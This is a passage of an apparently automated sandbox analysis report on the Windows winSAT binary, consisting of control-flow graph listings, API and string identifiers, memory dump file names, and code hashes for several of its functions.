1041->1057 1058 7ff780fa05bc-7ff780fa05c3 CoUninitialize 1041->1058 1042->1041 1044->1022 1049 7ff780fa04e9-7ff780fa04f0 1044->1049 1048->1033 1049->1022 1053 7ff780fa04f2-7ff780fa0508 call 7ff780fdb218 1049->1053 1053->1022 1064 7ff780fa050a-7ff780fa0511 call 7ff780fdb318 1053->1064 1061 7ff780fa05e6-7ff780fa05ed 1057->1061 1062 7ff780fa0635-7ff780fa063a 1057->1062 1058->1057 1061->1062 1067 7ff780fa05ef-7ff780fa05f9 1061->1067 1065 7ff780fa0665-7ff780fa066f 1062->1065 1066 7ff780fa063c-7ff780fa0643 1062->1066 1064->1022 1072 7ff780fa0671-7ff780fa0690 ReleaseMutex CloseHandle 1065->1072 1073 7ff780fa0697-7ff780fa069e 1065->1073 1070 7ff780fa0645-7ff780fa064f 1066->1070 1071 7ff780fa065e 1066->1071 1067->1062 1074 7ff780fa05fb-7ff780fa061a 1067->1074 1070->1071 1075 7ff780fa0651 1070->1075 1071->1065 1072->1073 1076 7ff780fa06a0-7ff780fa06de call 7ff780f95c78 1073->1076 1077 7ff780fa06e3-7ff780fa0721 call 7ff780fd5424 call 7ff780fcf510 call 7ff780fce3ac call 7ff780fce2f8 call 7ff780fa7e24 * 2 1073->1077 1074->1062 1082 7ff780fa061c-7ff780fa0628 1074->1082 1075->1071 1076->1077 1077->1012 1082->1062
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$CloseLibrary$EnabledErrorEventFreeHandleLastLoadOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryFindFormatHandlerLockMessageModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: Cannot ensure winsat directory exists: %s$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 182726192-3981140246
                                                                                                                                                                                              • Opcode ID: 16dd97eff7eaf70b191787b2855b9a103545096c84e45dd862aa0d4bb6796df2
                                                                                                                                                                                              • Instruction ID: 53e84a435c93e3e2f583ad3837131a219dfb5eae22665c44c6e7270a57184c30
                                                                                                                                                                                              • Opcode Fuzzy Hash: 16dd97eff7eaf70b191787b2855b9a103545096c84e45dd862aa0d4bb6796df2
                                                                                                                                                                                              • Instruction Fuzzy Hash: D90232A2E0D68795EB20FB15F8502F9B761FF81344FF09035D68E466A9DEACE544CB20
                                                                                                                                                                                              Function 00007FF780F9ED62 Relevance: 87.8, APIs: 44, Strings: 6, Instructions: 346synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1094 7ff780f9ed62-7ff780f9ed6c 1095 7ff780f9ed72-7ff780fa04bc call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa9e40 call 7ff780f92e8c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fa7e24 call 7ff780fd6730 call 7ff780fd73dc call 7ff780fcd160 call 7ff780fcf3b4 1094->1095 1096 7ff780fa075d-7ff780fa080d _CxxThrowException * 8 1094->1096 1139 7ff780fa0516-7ff780fa052f call 7ff780fca818 SetConsoleCtrlHandler 1095->1139 1140 7ff780fa04be-7ff780fa04c8 1095->1140 1111 7ff780fa0812-7ff780fa0af0 _CxxThrowException * 27 1096->1111 1125 7ff780fa0af1-7ff780fa0b0c _CxxThrowException 1111->1125 1128 7ff780fa0b0d-7ff780fa0b3f _CxxThrowException 1125->1128 1130 7ff780fa0b51-7ff780fa0b56 1128->1130 1131 7ff780fa0b41-7ff780fa0b4d FreeLibrary 1128->1131 1131->1130 1145 7ff780fa0531-7ff780fa0556 GetLastError call 7ff780fa9820 1139->1145 1146 7ff780fa0583-7ff780fa058a 1139->1146 1140->1125 1142 7ff780fa04ce-7ff780fa04d5 call 7ff780fa8a40 1140->1142 1142->1139 1149 7ff780fa04d7-7ff780fa04de 1142->1149 1145->1128 1159 7ff780fa055c-7ff780fa057e call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 1145->1159 1150 7ff780fa0591-7ff780fa0598 1146->1150 1151 7ff780fa058c call 7ff780f9a698 1146->1151 1149->1139 1155 7ff780fa04e0-7ff780fa04e7 1149->1155 1152 7ff780fa05a0-7ff780fa05ba call 7ff780f9ae84 1150->1152 1153 7ff780fa059a-7ff780fa059f call 7ff78100b75c 1150->1153 1151->1150 1168 7ff780fa05c8-7ff780fa05e4 RemoveDirectoryW 1152->1168 1169 7ff780fa05bc-7ff780fa05c3 CoUninitialize 1152->1169 1153->1152 1155->1139 1160 7ff780fa04e9-7ff780fa04f0 1155->1160 1159->1146 1160->1139 1164 7ff780fa04f2-7ff780fa0508 call 7ff780fdb218 1160->1164 1164->1139 1175 7ff780fa050a-7ff780fa0511 call 7ff780fdb318 1164->1175 1172 7ff780fa05e6-7ff780fa05ed 1168->1172 1173 7ff780fa0635-7ff780fa063a 1168->1173 1169->1168 1172->1173 1178 7ff780fa05ef-7ff780fa05f9 1172->1178 1176 7ff780fa0665-7ff780fa066f 1173->1176 1177 7ff780fa063c-7ff780fa0643 1173->1177 1175->1139 1183 7ff780fa0671-7ff780fa0690 ReleaseMutex CloseHandle 1176->1183 1184 7ff780fa0697-7ff780fa069e 1176->1184 1181 7ff780fa0645-7ff780fa064f 1177->1181 1182 7ff780fa065e 1177->1182 1178->1173 1185 7ff780fa05fb-7ff780fa061a 1178->1185 1181->1182 1186 7ff780fa0651 1181->1186 1182->1176 1183->1184 1187 7ff780fa06a0-7ff780fa06de call 7ff780f95c78 1184->1187 1188 7ff780fa06e3-7ff780fa0721 call 7ff780fd5424 call 7ff780fcf510 call 7ff780fce3ac call 7ff780fce2f8 call 7ff780fa7e24 * 2 1184->1188 1185->1173 1193 7ff780fa061c-7ff780fa0628 1185->1193 1186->1182 1187->1188 1188->1111 1193->1173
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$CloseErrorLast__uncaught_exception$FreeHandleOpenValue$AllocateCheckConsoleCtrlDeleteDirectoryFileFindHandlerInitializeLibraryLoadLockMembershipModuleMutexQueryReleaseRemoveSizeofStringTokenTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $PrivateError2$cannot determine if user is running with administrative privileges$A#
                                                                                                                                                                                              • API String ID: 3060205114-2799326703
                                                                                                                                                                                              • Opcode ID: 444af445a56d863f205c6cf2c0cbdbedab04ab233ada566e4db72c48f8bd48fc
                                                                                                                                                                                              • Instruction ID: 6f696bd6d8af9688ddf14575181987fffa6d3c80c68055d3443c849c51f8a9e8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 444af445a56d863f205c6cf2c0cbdbedab04ab233ada566e4db72c48f8bd48fc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 801243A2E0D68795EB20FB15F8502F9B761FF81344FF09035D64E466A9EEACE544CB20
                                                                                                                                                                                              Function 00007FF780F9EC8D Relevance: 87.8, APIs: 46, Strings: 4, Instructions: 336synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1205 7ff780f9ec8d-7ff780f9ec97 1206 7ff780fa0726-7ff780fa080d _CxxThrowException * 10 1205->1206 1207 7ff780f9ec9d-7ff780fa04bc call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fcf3b4 1205->1207 1227 7ff780fa0812-7ff780fa0af0 _CxxThrowException * 27 1206->1227 1230 7ff780fa0516-7ff780fa052f call 7ff780fca818 SetConsoleCtrlHandler 1207->1230 1231 7ff780fa04be-7ff780fa04c8 1207->1231 1234 7ff780fa0af1-7ff780fa0b0c _CxxThrowException 1227->1234 1241 7ff780fa0531-7ff780fa0556 GetLastError call 7ff780fa9820 1230->1241 1242 7ff780fa0583-7ff780fa058a 1230->1242 1231->1234 1235 7ff780fa04ce-7ff780fa04d5 call 7ff780fa8a40 1231->1235 1240 7ff780fa0b0d-7ff780fa0b3f _CxxThrowException 1234->1240 1235->1230 1248 7ff780fa04d7-7ff780fa04de 1235->1248 1245 7ff780fa0b51-7ff780fa0b56 1240->1245 1246 7ff780fa0b41-7ff780fa0b4d FreeLibrary 1240->1246 1241->1240 1259 7ff780fa055c-7ff780fa057e call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 1241->1259 1250 7ff780fa0591-7ff780fa0598 1242->1250 1251 7ff780fa058c call 7ff780f9a698 1242->1251 1246->1245 1248->1230 1255 7ff780fa04e0-7ff780fa04e7 1248->1255 1252 7ff780fa05a0-7ff780fa05ba call 7ff780f9ae84 1250->1252 1253 7ff780fa059a-7ff780fa059f call 7ff78100b75c 1250->1253 1251->1250 1268 7ff780fa05c8-7ff780fa05e4 RemoveDirectoryW 1252->1268 1269 7ff780fa05bc-7ff780fa05c3 CoUninitialize 1252->1269 1253->1252 1255->1230 1260 7ff780fa04e9-7ff780fa04f0 1255->1260 1259->1242 1260->1230 1264 7ff780fa04f2-7ff780fa0508 call 7ff780fdb218 1260->1264 1264->1230 1275 7ff780fa050a-7ff780fa0511 call 7ff780fdb318 1264->1275 1272 7ff780fa05e6-7ff780fa05ed 1268->1272 1273 7ff780fa0635-7ff780fa063a 1268->1273 1269->1268 1272->1273 1278 7ff780fa05ef-7ff780fa05f9 1272->1278 1276 7ff780fa0665-7ff780fa066f 1273->1276 1277 7ff780fa063c-7ff780fa0643 1273->1277 1275->1230 1283 7ff780fa0671-7ff780fa0690 ReleaseMutex CloseHandle 1276->1283 1284 7ff780fa0697-7ff780fa069e 1276->1284 1281 7ff780fa0645-7ff780fa064f 1277->1281 1282 7ff780fa065e 1277->1282 1278->1273 1285 7ff780fa05fb-7ff780fa061a 1278->1285 1281->1282 1286 7ff780fa0651 1281->1286 1282->1276 1283->1284 1287 7ff780fa06a0-7ff780fa06de call 7ff780f95c78 1284->1287 1288 7ff780fa06e3-7ff780fa06ff call 7ff780fd5424 call 7ff780fcf510 call 7ff780fce3ac 1284->1288 1285->1273 1293 7ff780fa061c-7ff780fa0628 1285->1293 1286->1282 1287->1288 1297 7ff780fa0704-7ff780fa0721 call 7ff780fce2f8 call 7ff780fa7e24 * 2 1288->1297 1293->1273 1297->1227
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$HandleOpenValue__uncaught_exception$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 2704613218-1443946128
                                                                                                                                                                                              • Opcode ID: ecb8b6c71e4be25ae6a288867cbde0fbae0d04b623f94b0d8d93ca7e6769272a
                                                                                                                                                                                              • Instruction ID: 3b2dd61c5ca12fdebae827a27d477671245b96fc597eeb24a93b20844c3b5d81
                                                                                                                                                                                              • Opcode Fuzzy Hash: ecb8b6c71e4be25ae6a288867cbde0fbae0d04b623f94b0d8d93ca7e6769272a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 700243A2D0D68795EB20FB15F8502F9B761FF81344FF09035D68E466A9EEACE544CB20
                                                                                                                                                                                              Function 00007FF780F9EF60 Relevance: 82.6, APIs: 42, Strings: 5, Instructions: 323synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1305 7ff780f9ef60-7ff780f9ef6a 1306 7ff780f9ef70-7ff780fa04bc call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac call 7ff780fcf3b4 1305->1306 1307 7ff780fa078e-7ff780fa080d _CxxThrowException * 6 1305->1307 1334 7ff780fa0516-7ff780fa052f call 7ff780fca818 SetConsoleCtrlHandler 1306->1334 1335 7ff780fa04be-7ff780fa04c8 1306->1335 1319 7ff780fa0812-7ff780fa0af0 _CxxThrowException * 27 1307->1319 1333 7ff780fa0af1-7ff780fa0b0c _CxxThrowException 1319->1333 1336 7ff780fa0b0d-7ff780fa0b3f _CxxThrowException 1333->1336 1343 7ff780fa0531-7ff780fa0556 GetLastError call 7ff780fa9820 1334->1343 1344 7ff780fa0583-7ff780fa058a 1334->1344 1335->1333 1338 7ff780fa04ce-7ff780fa04d5 call 7ff780fa8a40 1335->1338 1339 7ff780fa0b51-7ff780fa0b56 1336->1339 1340 7ff780fa0b41-7ff780fa0b4d FreeLibrary 1336->1340 1338->1334 1347 7ff780fa04d7-7ff780fa04de 1338->1347 1340->1339 1343->1336 1357 7ff780fa055c-7ff780fa057e call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 1343->1357 1348 7ff780fa0591-7ff780fa0598 1344->1348 1349 7ff780fa058c call 7ff780f9a698 1344->1349 1347->1334 1353 7ff780fa04e0-7ff780fa04e7 1347->1353 1350 7ff780fa05a0-7ff780fa05ba call 7ff780f9ae84 1348->1350 1351 7ff780fa059a-7ff780fa059f call 7ff78100b75c 1348->1351 1349->1348 1366 7ff780fa05c8-7ff780fa05e4 RemoveDirectoryW 1350->1366 1367 7ff780fa05bc-7ff780fa05c3 CoUninitialize 1350->1367 1351->1350 1353->1334 1358 7ff780fa04e9-7ff780fa04f0 1353->1358 1357->1344 1358->1334 1362 7ff780fa04f2-7ff780fa0508 call 7ff780fdb218 1358->1362 1362->1334 1373 7ff780fa050a-7ff780fa0511 call 7ff780fdb318 1362->1373 1370 7ff780fa05e6-7ff780fa05ed 1366->1370 1371 7ff780fa0635-7ff780fa063a 1366->1371 1367->1366 1370->1371 1376 7ff780fa05ef-7ff780fa05f9 1370->1376 1374 7ff780fa0665-7ff780fa066f 1371->1374 1375 7ff780fa063c-7ff780fa0643 1371->1375 1373->1334 1381 7ff780fa0671-7ff780fa0690 ReleaseMutex CloseHandle 1374->1381 1382 7ff780fa0697-7ff780fa069e 1374->1382 1379 7ff780fa0645-7ff780fa064f 1375->1379 1380 7ff780fa065e 1375->1380 1376->1371 1383 7ff780fa05fb-7ff780fa061a 1376->1383 1379->1380 1384 7ff780fa0651 1379->1384 1380->1374 1381->1382 1385 7ff780fa06a0-7ff780fa06de call 7ff780f95c78 1382->1385 1386 7ff780fa06e3-7ff780fa0721 call 7ff780fd5424 call 7ff780fcf510 call 7ff780fce3ac call 7ff780fce2f8 call 7ff780fa7e24 * 2 1382->1386 1383->1371 1391 7ff780fa061c-7ff780fa0628 1383->1391 1384->1380 1385->1386 1386->1319 1391->1371
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$EnabledEventHandleOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: failed COM initialization.$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 3454319971-2532484771
                                                                                                                                                                                              • Opcode ID: 4ca757c690d2b2a723f988808a70c26c882782de97aab818769bd2278fe7db12
                                                                                                                                                                                              • Instruction ID: cdb1b6f2b0c3efc5887f637003eb7ce583352ccace0668c243bf830b3598d1b2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ca757c690d2b2a723f988808a70c26c882782de97aab818769bd2278fe7db12
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C0242A2E0D68795EB20FB15F8502F9B761FF81344FF09035D68E466A9DEACE544CB20
                                                                                                                                                                                              Function 00007FF780F9EEFB Relevance: 82.6, APIs: 43, Strings: 4, Instructions: 322synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1403 7ff780f9eefb-7ff780f9ef05 1404 7ff780fa0779-7ff780fa080d _CxxThrowException * 7 1403->1404 1405 7ff780f9ef0b-7ff780fa04bc call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fcf3b4 1403->1405 1418 7ff780fa0812-7ff780fa0af0 _CxxThrowException * 27 1404->1418 1428 7ff780fa0516-7ff780fa052f call 7ff780fca818 SetConsoleCtrlHandler 1405->1428 1429 7ff780fa04be-7ff780fa04c8 1405->1429 1432 7ff780fa0af1-7ff780fa0b0c _CxxThrowException 1418->1432 1438 7ff780fa0531-7ff780fa0556 GetLastError call 7ff780fa9820 1428->1438 1439 7ff780fa0583-7ff780fa058a 1428->1439 1429->1432 1433 7ff780fa04ce-7ff780fa04d5 call 7ff780fa8a40 1429->1433 1437 7ff780fa0b0d-7ff780fa0b3f _CxxThrowException 1432->1437 1433->1428 1444 7ff780fa04d7-7ff780fa04de 1433->1444 1441 7ff780fa0b51-7ff780fa0b56 1437->1441 1442 7ff780fa0b41-7ff780fa0b4d FreeLibrary 1437->1442 1438->1437 1454 7ff780fa055c-7ff780fa057e call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 1438->1454 1445 7ff780fa0591-7ff780fa0598 1439->1445 1446 7ff780fa058c call 7ff780f9a698 1439->1446 1442->1441 1444->1428 1450 7ff780fa04e0-7ff780fa04e7 1444->1450 1447 7ff780fa05a0-7ff780fa05ba call 7ff780f9ae84 1445->1447 1448 7ff780fa059a-7ff780fa059f call 7ff78100b75c 1445->1448 1446->1445 1463 7ff780fa05c8-7ff780fa05e4 RemoveDirectoryW 1447->1463 1464 7ff780fa05bc-7ff780fa05c3 CoUninitialize 1447->1464 1448->1447 1450->1428 1455 7ff780fa04e9-7ff780fa04f0 1450->1455 1454->1439 1455->1428 1459 7ff780fa04f2-7ff780fa0508 call 7ff780fdb218 1455->1459 1459->1428 1470 7ff780fa050a-7ff780fa0511 call 7ff780fdb318 1459->1470 1467 7ff780fa05e6-7ff780fa05ed 1463->1467 1468 7ff780fa0635-7ff780fa063a 1463->1468 1464->1463 1467->1468 1473 7ff780fa05ef-7ff780fa05f9 1467->1473 1471 7ff780fa0665-7ff780fa066f 1468->1471 1472 7ff780fa063c-7ff780fa0643 1468->1472 1470->1428 1478 7ff780fa0671-7ff780fa0690 ReleaseMutex CloseHandle 1471->1478 1479 7ff780fa0697-7ff780fa069e 1471->1479 1476 7ff780fa0645-7ff780fa064f 1472->1476 1477 7ff780fa065e 1472->1477 1473->1468 1480 7ff780fa05fb-7ff780fa061a 1473->1480 1476->1477 1481 7ff780fa0651 1476->1481 1477->1471 1478->1479 1482 7ff780fa06a0-7ff780fa06de call 7ff780f95c78 1479->1482 1483 7ff780fa06e3-7ff780fa0721 call 7ff780fd5424 call 7ff780fcf510 call 7ff780fce3ac call 7ff780fce2f8 call 7ff780fa7e24 * 2 1479->1483 1480->1468 1488 7ff780fa061c-7ff780fa0628 1480->1488 1481->1477 1482->1483 1483->1418 1488->1468
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$HandleOpenValue__uncaught_exception$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 2704613218-1443946128
                                                                                                                                                                                              • Opcode ID: 7a1f602417a74ffa4989db2cb3566606fcb90c1e6489a876b242057cba5ea72b
                                                                                                                                                                                              • Instruction ID: e696bf25c42baceb4abdd2c71b4d918f5aacd13d91e86f2c5278a04203cf3aaf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a1f602417a74ffa4989db2cb3566606fcb90c1e6489a876b242057cba5ea72b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 380233A2E0D68795EB20FB15F8502F9B761FF81344FF09035D64E466A9EEACE544CB20
                                                                                                                                                                                              Function 00007FF780FDC700 Relevance: 79.2, APIs: 36, Strings: 9, Instructions: 444COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1500 7ff780fdc700-7ff780fdc777 GetModuleHandleW call 7ff780fdc5d8 1503 7ff780fdc77c-7ff780fdc7b2 FindResourceW 1500->1503 1504 7ff780fdc88f-7ff780fdc8b7 call 7ff780fdc470 _CxxThrowException 1503->1504 1505 7ff780fdc7b8-7ff780fdc7cc SizeofResource 1503->1505 1508 7ff780fdc8b8-7ff780fdc8e3 call 7ff780fdc470 _CxxThrowException 1504->1508 1507 7ff780fdc7d2-7ff780fdc7e7 LoadResource 1505->1507 1505->1508 1511 7ff780fdc8e4-7ff780fdc90f call 7ff780fdc470 _CxxThrowException 1507->1511 1512 7ff780fdc7ed-7ff780fdc802 LockResource 1507->1512 1508->1511 1514 7ff780fdc910-7ff780fdc93b call 7ff780fdc470 _CxxThrowException 1511->1514 1512->1514 1515 7ff780fdc808-7ff780fdc80e 1512->1515 1523 7ff780fdc93c-7ff780fdc967 call 7ff780fdc470 _CxxThrowException 1514->1523 1517 7ff780fdc812-7ff780fdc81c 1515->1517 1520 7ff780fdc830-7ff780fdc833 1517->1520 1521 7ff780fdc81e-7ff780fdc828 1517->1521 1525 7ff780fdc968-7ff780fdc9c6 call 7ff780fdc470 _CxxThrowException call 7ff780fdc700 1520->1525 1526 7ff780fdc839-7ff780fdc83f 1520->1526 1521->1523 1524 7ff780fdc82e 1521->1524 1523->1525 1524->1517 1538 7ff780fdca86-7ff780fdcb26 call 7ff780fdc470 _CxxThrowException call 7ff780fdc5d8 FindResourceW 1525->1538 1539 7ff780fdc9cc-7ff780fdca42 EnterCriticalSection LeaveCriticalSection vswprintf_s 1525->1539 1528 7ff780fdc863-7ff780fdc88e call 7ff780fdc470 _CxxThrowException 1526->1528 1529 7ff780fdc841-7ff780fdc861 1526->1529 1528->1504 1548 7ff780fdcbf1-7ff780fdcc1f GetLastError call 7ff780f93230 _CxxThrowException 1538->1548 1549 7ff780fdcb2c-7ff780fdcb41 LoadResource 1538->1549 